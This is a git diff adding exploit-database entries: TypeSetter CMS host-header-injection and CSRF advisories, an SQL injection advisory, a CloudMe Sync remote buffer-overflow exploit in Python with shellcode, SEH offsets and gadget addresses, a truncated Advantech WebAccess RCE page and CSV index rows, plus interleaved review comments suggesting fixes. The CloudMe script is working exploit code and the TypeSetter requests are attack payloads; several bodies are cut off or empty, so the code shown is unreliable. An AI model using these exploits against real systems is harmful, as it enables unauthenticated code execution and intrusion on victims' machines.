diff --git a/exploits/php/webapps/44028.txt b/exploits/php/webapps/44028.txt
new file mode 100644
index 000000000..e40144b04
--- /dev/null
+++ b/exploits/php/webapps/44028.txt
@@ -0,0 +1,34 @@
+​# Exploit Title: TypeSetter CMS 5.1 Host Header Injection
+# Date: 10-02-2018
+# Exploit Author: Navina Asrani
+# Contact: https://twitter.com/NavinaSanjay
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://www.typesettercms.com/
+# Version: 5.1
+# CVE : NA
+# Category: Webapp CMS
+
+1. Description
+
+The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning
+
+
+2. Proof of Concept
+
+1. Visit the application
+2. Tamper the request and change the host to any arbitrary header like google.com
+3. The same is added in request and complete page re-direction takes place.
+Exploitation Technique: A attacker can perform application modification to perform advanced attacks as as password reset/ cache poisoning etc.
+Severity Level: High
+Security Risk:
+The presence of such a risk can lead to user cache poisoning and user re-direction
+Exploit code:
+
+GET / HTTP/1.1
+Host: google.com
+
+You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/
+
+3. Solution:
+
+To Mitigate host header injections allows only a white-list of allowed host names.
\ No newline at end of file
diff --git a/exploits/php/webapps/44029.html b/exploits/php/webapps/44029.html
new file mode 100644
index 000000000..f6159f09e
--- /dev/null
+++ b/exploits/php/webapps/44029.html
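Review bot: The Solution section points in the right direction but stops short of the concrete control: the redirect target should be derived from a server-side configured canonical base URL rather than from the request's Host header, with an explicit allow-list of accepted hostnames as the fallback and a fixed error response (not an echo of the header) for anything else. The Proof of Concept only demonstrates that the Host value is reflected into the `Location` header; the password-reset and cache-poisoning impacts in the Description are inferred rather than shown, so the advisory should present them as potential consequences. Operators can spot this class of probing by logging requests whose Host header does not match a configured hostname. A few typos ('aribtary', 'A attacker', 'as as') could also be cleaned up.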
@@ -0,0 +1,40 @@ +# Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery +# Date: 10-02-2018 +# Exploit Author: Navina Asrani +# Contact: https://twitter.com/NavinaSanjay +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://www.typesettercms.com/ +# Version: 5.1 +# CVE : NA +# Category: Webapp CMS + +1. Description + +The application allows malcious HTTP requests to be directly executed without any hidden security token.This may lead to user account takeover or malious command execution + +2. Proof of Concept + +Exploit code: + + + +
+ + + + + + + + + + +
+
+
+
+
+
+3. Solution:
+
+To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens​
\ No newline at end of file
diff --git a/exploits/php/webapps/44030.txt b/exploits/php/webapps/44030.txt
new file mode 100644
index 000000000..88f477147
--- /dev/null
+++ b/exploits/php/webapps/44030.txt
@@ -0,0 +1,23 @@
+##################################################################
+# Exploit Title:News Website Script - SQL Injection (Error Based)
+# Google Dork: NA
+# Date: 12.02.2018
+# Exploit Author: Varun Bagaria
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: *http://under24usd.com/demo/newstoday/index.php
+# Version: 2.0.4
+# Tested on: Windows 7
+# Category: Webapps
+# CVE : NA
+##################################################################
+
+Proof of Concept
+=================
+
+Attack Parameter : search
+Payload : '
+
+Reproduction Steps:
+------------------------------
+1. Access the script
+2. In the search bar insert ' and you will get error based SQL Injection
\ No newline at end of file
diff --git a/exploits/windows/remote/44027.py b/exploits/windows/remote/44027.py
new file mode 100755
index 000000000..db2cd9297
--- /dev/null
+++ b/exploits/windows/remote/44027.py
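Review bot: As rendered here the Proof of Concept body of the CSRF advisory is empty (the lines between 'Exploit code:' and '3. Solution:' carry no content), so the text never identifies which TypeSetter endpoint and parameters the forged request reaches; the HTML form was most likely lost in this rendering rather than omitted by the author, but the advisory should name the affected action in prose so it stands without the markup. The Solution should also list the complementary controls alongside per-session anti-CSRF tokens: the `SameSite` cookie attribute on the session cookie and Origin/Referer verification on state-changing requests. 'recommeded' and 'malcious'/'malious' are typos.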
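Review bot: The advisory names the vulnerable parameter (`search`) but gives no affected script path, HTTP method, or mitigation section, unlike the other advisories in this commit, so a reader cannot map the finding to a specific request. Add the target page and method next to 'Attack Parameter', and a Solution section recommending parameterized queries (prepared statements) for the search lookup and disabling verbose database error output in production, since the exposed error text is what makes the error-based variant observable. The missing space in 'Exploit Title:News' is a minor typo.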
@@ -0,0 +1,171 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt +[+] ISR: Apparition Security +[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669 + + +Vendor: +============= +www.cloudme.com + + +Product: +=========== +CloudMe Sync <= v1.10.9 + +(CloudMe_1109.exe) +hash: 0e83351dbf86562a70d1999df7674aa0 + +CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. +It features a blue folder that appears on all devices with the same content, all files are synchronized between devices. + + + +Vulnerability Type: +=================== +Buffer Overflow + + + +CVE Reference: +============== +CVE-2018-6892 + + + +Security Issue: +================ +Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port 8888, can send a malicious payload causing +a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC. + +CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8) + +In Qt5Core: + +00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8 +00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX +00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst + + +C:\>netstat -ano | findstr 8888 +TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504 +TCP [::]:8888 [::]:0 LISTENING 15504 + + +Buffer Overflow: +================ +EIP register will be overwritten at about 1075 bytes. 
+ +EAX 00000001 +ECX 76F698DA msvcrt.76F698DA +EDX 00350000 +EBX 41414141 +ESP 0028D470 +EBP 41414141 +ESI 41414141 +EDI 41414141 +EIP 41414141 + +Stack Dump: +========== + +(508.524): Access violation - code c0000005 (first/second chance not available) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - +eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000 +eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +41414141 ?? ??? + +Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. +We will therefore use Structured Exceptional Handler overwrite for our exploit. + +e.g. + +6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll) +00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe) +61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll) + + +0day Exploit POC: +============== +import socket,struct + +print 'CloudMe Sync v1.10.9' +print 'Unauthenticated Remote Buffer Overflow 0day' +print 'Discovery/credits: hyp3rlinx' +print 'apparition security\n' + + +#shellcode to pop calc.exe Windows 7 SP1 +sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" +"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" +"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" +"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" 
+"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" +"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" +"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") + + +ip=raw_input('[+] CloudMe Target IP> ') + +nseh="\xEB\x06"+"\x90"*2 #JMP +seh=struct.pack('Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution + + + + +
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4bc031f83..331a4335b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16013,6 +16013,8 @@ id,file,description,date,author,type,platform,port
 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
 44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
+44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows,
+44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -38032,6 +38034,9 @@ id,file,description,date,author,type,platform,port
 44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
 44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
 44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
+44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php,
+44029,exploits/php/webapps/44029.html,"TypeSetter CMS 5.1 - Cross-Site Request Forgery",2018-02-13,"Navina Asrani",webapps,php,
+44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80